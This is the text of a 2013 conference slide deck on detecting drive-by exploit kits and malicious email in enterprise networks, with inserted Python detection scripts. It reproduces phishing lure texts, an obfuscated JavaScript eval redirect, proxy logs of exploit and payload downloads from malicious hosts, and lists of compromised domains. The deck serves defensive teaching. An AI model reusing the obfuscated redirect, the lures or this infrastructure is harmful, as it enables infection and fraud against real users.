Phd III - defending enterprise

DISSECTING RAW DATA: finding needles in the haystack, or the way to survive in the Dangerous Russian Environment
Fyodor Yarochkin, Vladimir Kropotov, Vitaly Chetvertakov
May 2013, Moscow


Page 1: Phd III - defending enterprise

DISSECTING RAW DATA: finding needles in the haystack

or the way to survive in the Dangerous Russian Environment

Fyodor Yarochkin Vladimir Kropotov Vitaly Chetvertakov May 2013, Moscow

Page 2: Phd III - defending enterprise

About the speakers

Common interest: investigating unlawful activities for fun and profit ;-)

We can't spell. All mistakes are ours :)
All the pictures used in this prezo are (c) googled ;-)

Page 3: Phd III - defending enterprise

Agenda

● Methodology of dealing with emerging threats
● Case studies
● Automation techniques and tools
● Q&A

Page 4: Phd III - defending enterprise

Overview

● Understand threats
● Real-time visibility
● You're owned. Your actions?
● Owned: finding who targets you, what data they want, what's been compromised

Prepare, Protect, Investigate, Detect

Page 5: Phd III - defending enterprise

Getting ready :)

PREPARE

Page 6: Phd III - defending enterprise

Initial network compromise: threats

● DbD (drive-by download) attacks
● Email as attack vector
● Direct attacks against servers

Client-targeting attacks are on the rise: EASY! Bigger number of targets! Users' cumulative IQ < 0! ;-)

Page 7: Phd III - defending enterprise

Drive-by in a nutshell :)

● Visit an infected site (any banner network can be a lead too)
● Traffic distribution/TDS (not compulsory)
● Target identification (JavaScript exploit selection)
● Exploit
● Payload (.exe)
● Profit!

STILL BIG!!

Page 8: Phd III - defending enterprise

DBD attacks

Before...
● Easy to collect samples
● Payload sent over the wire in plain
● Easy to automate analysis with sandbox

Now
● Payload is typically encoded (XOR) or encrypted
● Exploit triggered on user events
● Serve once per IP, blacklisting

Page 9: Phd III - defending enterprise

APT! APT! APT! APT! APT! APT! APT! APT! APT! APT! APT! APT! APT! APT! APT! APT! APT!

Page 10: Phd III - defending enterprise

So, what is APT?

Someone wants YOUR stuff :-)

Page 11: Phd III - defending enterprise

Drive-by .. are you a target?

APT
● A single exploit
● Served to a limited range of IP addresses (sometimes)
● Payload behavior is very specific

Not APT
● Exploit packs
● Generic exploit packs (Redkit, Neutrino, the famous Blackhole, etc.)
● Payload varies

Page 12: Phd III - defending enterprise

APT-related drive-by example

● Does not include many exploits
● Is not using any off-the-shelf exploit pack
● Exploit code changes often

Page 13: Phd III - defending enterprise

APT example cont..

● Binary pattern payload. VM sandbox detection

Page 14: Phd III - defending enterprise

Call-back analysis

Page 15: Phd III - defending enterprise

Bot vs Human

Page 16: Phd III - defending enterprise

Exploit packs and kits

Page 17: Phd III - defending enterprise

Bodyless Bot

Page 18: Phd III - defending enterprise
Page 19: Phd III - defending enterprise

GET;http://demonsstoryboard.pw/80F5;HTTP/1.1 95.211.7.3 200 57505 http://234x120.adv.vz.ru/cgi-bin/iframe/vz?1787&options=N Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1) text/html

GET;http://demonsstoryboard.pw/080F5wj;HTTP/1.1 95.211.7.3 200 20380 - Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07 application/java-archive

GET;http://demonsstoryboard.pw/180F5wj;HTTP/1.1 95.211.7.3 200 135534 - Java/1.7.0_07 application/octet-stream

Exploit kits in your log

Page 20: Phd III - defending enterprise

Cross-domain

Page 21: Phd III - defending enterprise

GET;http://teware.info/crossdomain.xml;HTTP/1.1 62.109.7.187 200 391 Mozilla/4.0;(compatible;;MSIE;7.0;;Windows) text/xml

GET;http://teware.info/counter/hit/client_de5df061c99066d82cfc437f2b099455;HTTP/1.1 62.109.7.187 200 826 http://www.divetour.su/admin/lang/EN/logit.swf Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1) text/html

GET;http://isxops.info/ocycytyruwewufibegidutivabi;HTTP/1.1 82.146.56.201 200 27206 http://www.divetour.su/ Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1) text/html

GET;http://tolizuhifa.ghmarspi.in.ua/izijyqyzoxym;HTTP/1.1 188.120.230.94 200 9926 Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07 application/3dr

GET;http://tolizuhifa.ghmarspi.in.ua/ebyhoducibe;HTTP/1.1 188.120.230.94 200 164332 Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07 application/executable

Page 22: Phd III - defending enterprise
Page 23: Phd III - defending enterprise
Page 24: Phd III - defending enterprise
Page 25: Phd III - defending enterprise

GET;http://dapru.crackedsidewalks.com/viewforum.php?b=75c3d28;HTTP/1.1 37.9.52.21 200 949 http://verygoodcom.net/forum/viewtopic.php?f=31363995&t=45869451 Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1) text/html

GET;http://dapru.crackedsidewalks.com/profile.php?exp=atom&b=75c3d28&k=eb5e2a99b9c4326e02b6e9efbe139972;HTTP/1.1 37.9.52.21 200 647 - Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07 application/java-archive

GET;http://dapru.crackedsidewalks.com/y41gr.php?exp=atom&b=75c3d28&k=eb5e2a99b9c4326e02b6e9efbe139972;HTTP/1.1 37.9.52.21 403 295 - Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07 -

Page 26: Phd III - defending enterprise

Get 0wned quick!

Page 27: Phd III - defending enterprise

Domain-rotation techniques

Page 28: Phd III - defending enterprise

http://olgaclaroto.com/mikcxwe.php

http://fcslavutich.ck.ua/nmwdbvg.php

http://temizayakkabi.com/larwyyo.php

http://familystori.com/mhwrdaw.php

http://www.residensea.jp/xuaioxc.php

http://firenzeviaroma.ru/dqryony.php

http://sphynxtoutnu.com/dnqaibb.php

http://www.icmjapan.co.jp/dgttcnm.php

http://www.controlseal.nl/yolelkx.php

http://ural.zz.mu/ledstsn.php

http://www.fotobit.pl/cpjjpei.php

http://bgcarshop.com/tgghhvy.php

http://www.borkowski.org/fudbqrf.php

http://shop.babeta.ru/puthnkn.php

http://e-lustrate.us/mycbbni.php

http://notarypublicconcept.com/shfvtpx.php

http://www.stempelxpress.nl/vechoix.php

http://64.68.190.53/dqohago.php

http://likos.orweb.ru/oydochh.php

http://wap.warelex.com/parpkeu.php

http://caglayandalgicpompa.com/vgptlav.php

http://v-madrid.ru/iqsjnvl.php

http://www.tamandhiep.com/caectvo.php

http://bulgurluhamami.com/wyscthy.php

http://pcprint.es/xymijte.php

http://genckoltukdoseme.com/jydudjd.php

http://www.mgftools.com/fakmgbv.php

http://ohtparis.com/msmfguo.php

http://kenankocticaret.com/myrivrk.php

http://restaurangmaskiner.net/rwuwkqx.php

http://fvp.nau.edu.ua/uhetymf.php

http://kontra-antiabzocker.net/xubolww.php

http://artmaster39.ru/jtfsajd.php

http://drcalotti.com/llfisbj.php

http://adult-toy.ru/immjdti.php

http://corumhaberi.com/ugfrcal.php

http://opr.kz/jwcxbwi.php

http://peggysmith.nl/thtaywn.php

http://nic-ram.com/jqdkfrh.php

http://minsociety.org/djafssg.php

Page 29: Phd III - defending enterprise
Page 30: Phd III - defending enterprise

Domain rotation victims

● Over 500 compromised domains in 24 hours

● Domain rotation once per minute (3 minutes in the other incident)

Page 31: Phd III - defending enterprise

TDS injections

Page 32: Phd III - defending enterprise
Page 33: Phd III - defending enterprise

GET;http://ctgwllr.changeip.name/googlestat.php;HTTP/1.1 37.10.104.72 200 640 http://www.english-shoes.ru/products/41/ Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1) text/html

GET;http://ctgwllr.changeip.name/uqrojdt/2;HTTP/1.1 37.10.104.72 200 442 http://www.english-shoes.ru/products/41/ Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1) text/html

GET;http://qxcrr-xerox.janitorbe.biz/stranger-constructing-restoring.html;HTTP/1.1 31.7.184.194 200 1578 3 http://ctgwllr.changeip.name/uqrojdt/2 Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1) text/html

GET;http://qxcrr-xerox.janitorbe.biz/a544444444ZZZZZZZZwwwwwww/9d20Z7eQ7QeQe/citizen.php5;HTTP/1.1 31.7.184.194 200 466 http://qxcrr-xerox.janitorbe.biz/stranger-constructing-restoring.html Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1) text/html

GET;http://qxcrr-xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQq/901212121255;HTTP/1.1 31.7.184.194 200 1001 http://qxcrr-xerox.janitorbe.biz/a544444444ZZZZZZZZwwwwwww/9d20Z7eQ7QeQe/citizen.php5 Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1) text/html

GET;http://qxcrr-xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQq/text.jar;HTTP/1.1 31.7.184.194 200 8772 Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07 application/x-jar

GET;http://qxcrr-xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQq/0256000045/6799928;HTTP/1.1 31.7.184.194 200 8636 4 Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07 application/java-archive

Page 34: Phd III - defending enterprise

Electronic Mail as attack vector

● Email is another common method for an adversary to get a foot into the target network.
● Attractiveness:
  ● Low profile (you only send emails to those who you want to compromise)
  ● Easy antivirus bypass (password-packed zip archives, anyone? :)
  ● Users are generally – idiots ;-)

Page 35: Phd III - defending enterprise

Email as attack vector.. are you a target?

APT?
● Single exploit
● Content of the mail is accurate to context
● Specific payload behavior (stats)

Non-targeted
● Mass-mailed
● Often no exploit used (.exe in attachment)

Page 36: Phd III - defending enterprise

APT through email.. An RTF document (CVE-2012-0158 - "MSCOMCTL.OCX RCE Vulnerability")

● Payload writes a DLL file
● Recent build date (2013)
● Autorun for persistence
● Calls back to a C2 server group
● Suspicious user agents:

Mozilla/4.0 (compatible; MSIE 6.0.1.3; Windows NT 5.0.3)
Mozilla/4.0 (compatible; MSIE 5.0.2)
Mozilla/4.0 (compatible)

Page 37: Phd III - defending enterprise

How to catch...

● Suspicious agents – works nicely (and easy to implement with Snort, Suricata, etc.)
● Time-series traffic analysis

Emerging Threats has a large number of APT-related sigs. Take and modify :)
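The "suspicious agents" check above, written out as an added Python example (not code from the talk or from any tool it mentions): it flags the three C2 User-Agent strings quoted on the previous slide by comparing their MSIE and Windows NT version tokens with the versions that shipping builds actually report, and turns each confirmed-bad string into a Suricata rule on the HTTP User-Agent sticky buffer. The known-version sets, the rule template and the sid range are this example's own assumptions; the sid values are placeholders for an operator's local range.

```python
import re

# Version tokens that shipping Internet Explorer and Windows NT builds report.
# MSIE 6.0.1.3, MSIE 5.0.2 and Windows NT 5.0.3, as quoted on the slide, never
# existed: a token outside these sets is a hand-written string, not a browser.
KNOWN_MSIE_VERSIONS = {"5.0", "5.5", "6.0", "7.0", "8.0", "9.0", "10.0", "11.0"}
KNOWN_NT_VERSIONS = {"5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}

MSIE_RE = re.compile(r"MSIE ([\d.]+)")
NT_RE = re.compile(r"Windows NT ([\d.]+)")
BARE_RE = re.compile(r"^Mozilla/\d\.\d \(compatible\)$")   # no browser token at all


def user_agent_anomalies(ua):
    """Reasons a User-Agent looks hand-written; an empty list means it passed."""
    ua = ua.strip()
    reasons = []
    if BARE_RE.match(ua):
        reasons.append("no-browser-token")
    m = MSIE_RE.search(ua)
    if m and m.group(1) not in KNOWN_MSIE_VERSIONS:
        reasons.append("bogus-msie-version:" + m.group(1))
    m = NT_RE.search(ua)
    if m and m.group(1) not in KNOWN_NT_VERSIONS:
        reasons.append("bogus-nt-version:" + m.group(1))
    return reasons


def escape_content(text):
    """Suricata content strings may not contain raw " ; : | or backslash;
    hex-encode those characters as |XX| so the UA can be matched verbatim."""
    return "".join(f"|{ord(ch):02X}|" if ch in '";:|\\' else ch for ch in text)


def suricata_rule(ua, sid):
    """One Suricata rule matching the bad UA exactly in the User-Agent buffer
    (sticky-buffer syntax). sid is a placeholder for the operator's local range."""
    return ("alert http $HOME_NET any -> $EXTERNAL_NET any ("
            'msg:"Hand-written IE User-Agent seen in C2 traffic"; '
            "flow:established,to_server; "
            f'http.user_agent; content:"{escape_content(ua)}"; '
            f"classtype:trojan-activity; sid:{sid}; rev:1;)")


def scan(user_agents, first_sid=9000001):
    """Emit one rule per anomalous UA string in the batch."""
    rules = []
    for ua in user_agents:
        if user_agent_anomalies(ua):
            rules.append(suricata_rule(ua.strip(), first_sid + len(rules)))
    return rules


# The three strings quoted on the slide plus one legitimate IE 7 string for contrast
SAMPLE_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0.1.3; Windows NT 5.0.3)",
    "Mozilla/4.0 (compatible; MSIE 5.0.2)",
    "Mozilla/4.0 (compatible)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1)",
]

if __name__ == "__main__":
    for rule in scan(SAMPLE_AGENTS):
        print(rule)
```

The version check is deliberately narrow: it only reacts to a token that no real build ever produced, so the legitimate IE 7 string passes untouched, and a match is a strong lead rather than a statistical anomaly. Run `scan()` over the distinct User-Agent values in a day of proxy logs before loading the resulting rules, so that any in-house tool with an odd UA is whitelisted first.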

Page 38: Phd III - defending enterprise

Owning a network..

● Vulnerabilities seen in use through this attack vector:

Adobe Acrobat Reader: CVE-2013-0640, CVE-2012-0775
Adobe Flash Player: CVE-2012-1535
MS Office: CVE-2012-0158, CVE-2011-1269, CVE-2010-3333, CVE-2009-3129
Java: CVE-2013-0422, CVE-2012-1723, CVE-2012-5076

Page 39: Phd III - defending enterprise

But...

● Human stupidity is exploited more than ever..

Page 40: Phd III - defending enterprise

Email with a password protected archive or a document

● Password protected archives bypass AV checks and firewall/WAF/.. detection
● No exploit. The executable file is masked as a document (icon, extension)
● The message content motivates the user to open the attachment (social engineering)

Page 41: Phd III - defending enterprise

Good afternoon, According to the results of an audit, our firm has found a debt to you for January in the amount of 9540 rubles. Our chief accountant has prepared a reconciliation statement and asks you to sign this statement and send back its scan. She also asks what is best to write when transferring the funds.
_____________________________________________________________________________________

Sincerely, Commercial Director of OAO "M-TORG", Markina Olga Alekseevna

P.S. The reconciliation statement is attached to the letter; the archive password is 111

Let's look at some examples

Page 42: Phd III - defending enterprise

Good afternoon, According to the results of an audit, our firm has found a debt to you for December 2012 in the amount of 49540 rubles. Our chief accountant has prepared a reconciliation statement and asks you to sign this statement and send back its scan. She also asks what is best to write when transferring the funds.
_______________________________________________________________________________

Sincerely, Accountant of ZAO "MSK", Kalinina Vera Vladimirovna

P.S. The reconciliation statement is attached to the letter; the archive password is 123

Examples (cont...)

The authors' English rendering on the slide: Good afternoon, According to the results of the audit, our firm will transfer the debt to you for December 2012 in the sum of 49540 rubles. Our chief accountant made an act of reconciliation and asked to sign the act and send its scan. Sincerely, Accountant of "MSK", Vera V. Kalinina. P.S. statement attached to the letter, the password for the archive 123

Page 43: Phd III - defending enterprise

Unpacked file

.. and inside archive :)

Page 44: Phd III - defending enterprise

Subject: British Airways E-ticket receipts

e-ticket receipt
Booking reference: 05V9363845

Dear,
Thank you for booking with British Airways.
Ticket Type: e-ticket
This is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for your booking.
Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file)
Yours sincerely,
British Airways Customer Services

British Airways may monitor email traffic data and also the content of emails, where permitted by law, for the purposes of security and staff training and in order to prevent or detect unauthorised use of the British Airways email system.
British Airways Plc is a public limited company registered in England and Wales. Registered number: 89510471. Registered office: Waterside, PO Box 365, Harmondsworth, West Drayton, Middlesex, England, UB7 0GB.

How to contact us
Although we are unable to respond to individual replies to this email we have a comprehensive section that may help you if you have a question about your booking or travelling with British Airways.
If you require further assistance you may contact us

If you have received this email in error
This is a confidential email intended only for the British Airways Customer appearing as the addressee. If you are not the intended recipient please delete this email and inform the snder as soon as possible. Please note that any copying, distribution or other action taken or omitted to be taken in reliance upon it is prohibited and may be unlawful.

Another example

Page 45: Phd III - defending enterprise

Another variation: email that contains masked links to malicious pages

• No attachment. The message is HTML/text that points to the same resource
• All links are 'masked' to appear to point to legitimate links
• The same attractive text of the message

Page 46: Phd III - defending enterprise

<body>

<h1><b>Please wait. You will be forwarded.. . </h1></b>

<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>

<script>ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="val";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,100,111,113,115,109,44,106,97,45,112,117,57,54,48,55,46,47,101,109,114,116,107,47,107,103,110,106,113,47,98,109,108,116,107,110,45,110,104,111,32,59,124);}w=f;s=[];if(window.document)for(i=2-2;-i+104!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+j%zz);}xz=e;if(v)xz(s)}</script>

</body>

</html>

Encoded redirect..

Page 47: Phd III - defending enterprise

Hot topic for a big company: the Cyprus crisis

Diana Ayala saw this story on the BBC News website and thought you should see it.

** Cyprus bailout: bank levy passed parliament already! **
Cyprus can amend terms to a bailout deal that has sparked huge public anger....
< http://www.bbc.com.us/go/em/news/world-cyprus-57502820>

** BBC Daily E-mail **
Choose the news and sport headlines you want - when you want them, all in one daily e-mail
< http://www.bbc.co.uk/email>

** Disclaimer **
The BBC is not responsible for the content of this e-mail, and anything written in this e-mail does not necessarily reflect the BBC's views or opinions. Please note that neither the e-mail address nor name of the sender have been verified. If you do not wish to receive such e-mails in the future or want to know more about the BBC's Email a Friend service, please read our frequently asked questions by clicking here

Page 48: Phd III - defending enterprise

This message is to notify you that your package has been processed and is on schedule for delivery from ADP. Here are the details of your delivery:
Package Type: QTR/YE Reporting
Courier: UPS Ground
Estimated Time of Arrival: Tusesday, 5:00pm
Tracking Number (if one is available for this package): 1Z023R961390411904
Details: Click here to view and/or modify order
We will notify you via email if the status of your delivery changes.
--------------------------------------------------------------------------------
Access these and other valuable tools at support.ADP.com:
o Payroll and Tax Calculators
o Order Payroll Supplies, Blank Checks, and more
o Submit requests online such as SUI Rate Changes, Schedule Changes, and more
o Download Product Documentation, Manuals, and Forms
o Download Software Patches and Updates
o Access Knowledge Solutions / Frequently Asked Questions
o Watch Animated Tours with Guided Input Instructions
Thank You,
ADP Client Services
support.ADP.com
--------------------------------------------------------------------------------

This message and any attachments are intended only for the use of the addressee and may contain information that is privileged and confidential. If the reader of the message is not the intended recipient or an authorized representative of the intended recipient, you are hereby notified that any dissemination of this communication is strictly prohibited. If you have received this communication in error, notify the sender immediately by return email and delete the message and any attachments from your system.

Page 49: Phd III - defending enterprise

What happens if you click..

Page 50: Phd III - defending enterprise

So once we have the basic knowledge, let's move on :)

DETECT

Page 51: Phd III - defending enterprise

We will spend a bit more time discussing detection activities.

Because this is what we primarily do :)

Page 52: Phd III - defending enterprise

So how do you detect attacks in your traffic..

Page 53: Phd III - defending enterprise

What to look for..

• Search for randomly generated domains
• Search for 3rd-level domains with dynamic DNS prefixes (dyndns, dnsdojo, etc.)
• Search by known malware IPs
• Search by known constant parts in URLs and domain names
• Search by intermediate domains used in the attack
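One way to script the first four searches listed above, as an added Python example (not code from the talk): it scores a proxy-log URL for random-looking DNS labels, a dynamic-DNS suffix, a known-bad server IP and the constant /<7 lowercase letters>.php path that every entry in the domain-rotation list on slide 28 shares. The dynamic-DNS suffix list is a stub (dyndns and dnsdojo are named on the slide, changeip.name appears in the TDS log excerpt), the bad-IP set stands in for a threat feed, and the randomness thresholds are this example's own choices.

```python
import math
import re
from collections import Counter
from urllib.parse import urlsplit

# Dynamic-DNS suffixes: dyndns and dnsdojo are named on the slide, changeip.name
# appears in the TDS log excerpt; the list is a stub to extend per environment.
DYNDNS_SUFFIXES = ("dyndns.org", "dnsdojo.com", "dnsdojo.net", "dnsdojo.org",
                   "changeip.name")
# Constant URL part from the domain-rotation list: /<7 lowercase letters>.php
ROTATION_PATH = re.compile(r"^/[a-z]{7}\.php$")
VOWELS = set("aeiouy")


def shannon_entropy(text):
    """Bits per character of the string; 26 distinct letters top out near 4.7."""
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values()) if n else 0.0


def label_looks_random(label):
    """Cheap randomness heuristics for one DNS label (thresholds chosen here).
    Pronounceable DGA names like those in the log excerpts often pass these
    checks, so treat a hit as a lead to pivot on, not a verdict."""
    letters = re.sub(r"[^a-z]", "", label.lower())
    if len(letters) < 7:
        return False
    vowel_ratio = sum(ch in VOWELS for ch in letters) / len(letters)
    return (vowel_ratio < 0.2
            or len(letters) >= 20
            or (len(letters) >= 10 and shannon_entropy(letters) >= 3.5))


def score_url(url, server_ip=None, bad_ips=frozenset()):
    """Return the reasons a proxy-log URL deserves a closer look (empty = none)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    labels = host.split(".")
    reasons = []
    for suffix in DYNDNS_SUFFIXES:
        if host.endswith("." + suffix):          # a 3rd-level name under a DDNS provider
            reasons.append("dynamic-dns:" + suffix)
    for label in labels[:-1]:                    # every label except the TLD
        if label_looks_random(label):
            reasons.append("random-label:" + label)
    if server_ip is not None and server_ip in bad_ips:   # known malware IP feed
        reasons.append("known-bad-ip:" + server_ip)
    if ROTATION_PATH.match(parts.path):
        reasons.append("rotation-path:" + parts.path)
    return reasons


if __name__ == "__main__":
    # URLs and server IP taken from the log excerpts on the slides; the bad-IP
    # set is a constructed stand-in for a threat-intel feed.
    feed = {"37.10.104.72"}
    for url, ip in [("http://ctgwllr.changeip.name/googlestat.php", "37.10.104.72"),
                    ("http://olgaclaroto.com/mikcxwe.php", None),
                    ("http://www.english-shoes.ru/products/41/", None)]:
        print(url, "->", score_url(url, ip, feed) or "clean")
```

The TDS host from slide 33 trips three checks at once (vowel-free label, dynamic-DNS suffix, listed IP), the compromised shop from the rotation list trips only the constant path, and the legitimate referer page trips nothing. That spread is the point: each heuristic alone is noisy, so rank hosts by how many reasons they accumulate and pivot on the intermediate domains from there.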

Page 54: Phd III - defending enterprise

Common Counter-Detection Techniques

• Banner network simulation
• DGA-generated domains
• Compromised domains
• dyndns
• Time-based redirects (9 till 6pm Moscow time)
• Using non-standard ports
• Once per IP per day
• Blacklists (Yes! They blacklist us too)

Page 55: Phd III - defending enterprise

Things to look for..

1) MIME type
• application/java-archive, application/x-jar, application/3dr for Java exploits
• application/pdf for Acrobat Reader exploits
• application/x-shockwave-flash for Adobe Flash Player

2) User agent (Mozilla(Windows ...))
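Putting the MIME-type and user-agent hints above together with the log excerpts shown earlier (the demonsstoryboard.pw, dapru.crackedsidewalks.com and janitorbe.biz chains), here is an added Python example, not code from the talk: it classifies each proxy record as a landing page fetched by the browser, an exploit fetched by the JVM or a binary payload fetched by the JVM, and reports hosts that serve all three in order. The tab-separated record layout and the sample lines are constructed for this example; application/x-msdownload is added to the binary types and is not on the slides.

```python
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlsplit

# Content types the slides name for exploit delivery, plus the binary types
# seen in the log excerpts (application/x-msdownload is an addition here).
JAVA_TYPES = {"application/java-archive", "application/x-jar", "application/3dr"}
BINARY_TYPES = {"application/octet-stream", "application/executable",
                "application/x-msdownload"}
STAGES = ("landing", "exploit", "payload")

# Constructed sample, tab-separated, one field per column the slides show:
# request line; server IP; status; bytes; referer; user agent; content type.
SAMPLE_LOG = """\
GET;http://landing.example.test/forum/viewtopic.php?b=1;HTTP/1.1\t192.0.2.10\t200\t949\thttp://banner.example.test/iframe?1787\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1)\ttext/html
GET;http://landing.example.test/profile.php?exp=atom&b=1;HTTP/1.1\t192.0.2.10\t200\t20380\t-\tMozilla/4.0 (Windows 7 6.1) Java/1.7.0_07\tapplication/java-archive
GET;http://landing.example.test/1F5wj;HTTP/1.1\t192.0.2.10\t200\t135534\t-\tJava/1.7.0_07\tapplication/octet-stream
GET;http://www.example.test/index.html;HTTP/1.1\t198.51.100.5\t200\t5120\t-\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1)\ttext/html
GET;http://cdn.example.test/lib/app.jar;HTTP/1.1\t198.51.100.9\t200\t40000\thttp://www.example.test/index.html\tMozilla/4.0 (Windows 7 6.1) Java/1.7.0_07\tapplication/java-archive
"""


@dataclass
class Record:
    method: str
    url: str
    host: str
    server_ip: str
    status: int
    size: int
    referer: str
    user_agent: str
    content_type: str


def parse_line(line):
    """Split one constructed proxy record into a Record."""
    request, server_ip, status, size, referer, ua, ctype = line.rstrip("\n").split("\t")
    method, rest = request.split(";", 1)
    url, _proto = rest.rsplit(";", 1)
    return Record(method, url, (urlsplit(url).hostname or "").lower(), server_ip,
                  int(status), int(size), referer, ua, ctype.lower())


def stage_of(rec):
    """Classify a record as a drive-by stage, or None if it fits none."""
    jvm = "Java/" in rec.user_agent          # the JVM, not the browser, fetched it
    if rec.content_type in JAVA_TYPES and jvm:
        return "exploit"
    if rec.content_type in BINARY_TYPES and jvm:
        return "payload"
    if rec.content_type.startswith("text/html") and not jvm:
        return "landing"
    return None


def find_exploit_chains(lines):
    """Report hosts that serve landing page, exploit and payload in that order.
    A jar alone (a legitimate applet on a CDN) never completes the chain."""
    by_host = defaultdict(list)
    for line in lines:
        if line.strip():
            rec = parse_line(line)
            stage = stage_of(rec)
            if stage:
                by_host[rec.host].append((stage, rec))
    chains = []
    for host, events in by_host.items():
        seen = []
        for stage, rec in events:
            if stage == STAGES[len(seen)]:
                seen.append(rec)
                if len(seen) == len(STAGES):
                    break
        if len(seen) == len(STAGES):
            chains.append({"host": host, "server_ip": seen[0].server_ip,
                           "entry_referer": seen[0].referer,
                           "urls": [r.url for r in seen],
                           "status": [r.status for r in seen]})
    return chains


if __name__ == "__main__":
    for chain in find_exploit_chains(SAMPLE_LOG.splitlines()):
        print(chain["host"], "via", chain["entry_referer"])
        for url in chain["urls"]:
            print("   ", url)
```

The status codes are kept in the result on purpose: in the dapru.crackedsidewalks.com excerpt the final request came back 403, which is what "serve once per IP" looks like from the second visitor, so a chain whose payload stage was refused is still worth the same triage as one that succeeded. The entry referer is kept for the same reason; in the first excerpt it points at the banner network that delivered the visitor.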

Page 56: Phd III - defending enterprise

Example..

Page 57: Phd III - defending enterprise
Page 58: Phd III - defending enterprise

Other things to pay attention to...

• Exploit code/malware components in the Temp folder
• Activity of installer malware
• Detect bruteforce attacks on standard accounts: admin, guest
• Look for other suspicious IDS events: HTTP_Probe, SMB_Probes, etc.

Page 59: Phd III - defending enterprise

Antivirus finds an exploit in the cache -> we were attacked -> antivirus saves us! ;-)

The exploit can be in the cache – AV finds it :)

AV logs – useful ;)

Page 60: Phd III - defending enterprise

Antivirus detects malware modules

Page 61: Phd III - defending enterprise

PROTECT

Page 62: Phd III - defending enterprise

Approaches

Identify impact and isolate impacted machines

Exploit features of exploit kits to immunize your network

Page 63: Phd III - defending enterprise

Attacker wants to serve once per IP...

● Automate visits to exploit pack serving points from your client honeybox/VM.
● Magic – the exploit is not served to your users anymore.

Page 64: Phd III - defending enterprise

Exploiting redundancy properties in malware distribution and post-infection activity campaigns

Page 65: Phd III - defending enterprise

INVESTIGATE

Page 66: Phd III - defending enterprise

DNSLyzer

http://github.com/fygrave/dnslyzer/

Page 67: Phd III - defending enterprise

Not only the payload carries data: the URL itself is used as a covert channel (here, the victim's OS, browser and plugin versions)

● GET hxxp://lionsholders.biz/st.php?os=windows%207&browser=msie&browserver=8.0&adobe%20reader=10.1&adobe%20flash=11.7.700.169&windows%20media%20player=12.0.7601.17514&java=0&silverlight=0

Page 68: Phd III - defending enterprise

GET READY FOR AV TROLL!! :)

Page 69: Phd III - defending enterprise

Strange things happen on the wire;)

Page 70: Phd III - defending enterprise
Page 71: Phd III - defending enterprise
Page 72: Phd III - defending enterprise

Useful tools

● AOL Moloch https://github.com/aol/moloch

Page 73: Phd III - defending enterprise

APT mail

● Xecure-lab APT document scanner

Page 74: Phd III - defending enterprise

TIPS

Page 75: Phd III - defending enterprise

Encrypted payload in non-targeted attacks

● If the full attack session was not collected (e.g. traffic dumps), don't waste the vendor's time
● Block all unrecognized/uncategorized content (default deny), or you get false negatives at all intermediate (transit) hosts

Page 76: Phd III - defending enterprise

Be careful sharing/checking samples online, especially for targeted attacks

● Vendors share while attackers monitor changes
● FP ~ you shared some internal stuff (especially non-executable files, like office documents) with a third party = security policy violation

Page 77: Phd III - defending enterprise

Monitoring VS Protection

● Strange, but true:

Efficiency(Monitoring) ~ O(1 / Efficiency(Protection))

Page 78: Phd III - defending enterprise

Incident Mitigation VS Investigation

● If your preparation is not enough:

Efficiency(Mitigation) ~ O(1 / Efficiency(Investigation))

● If you have prepared, almost all steps of the investigation can be done asynchronously

Page 79: Phd III - defending enterprise

DISCLAIMER

Tracking activity of the organization in 3rd-party networks

● The examples in this presentation relate to incidents in third-party networks and were reproduced in an environment that is desirable to the attacker but adapted by us.

Page 80: Phd III - defending enterprise

Q & A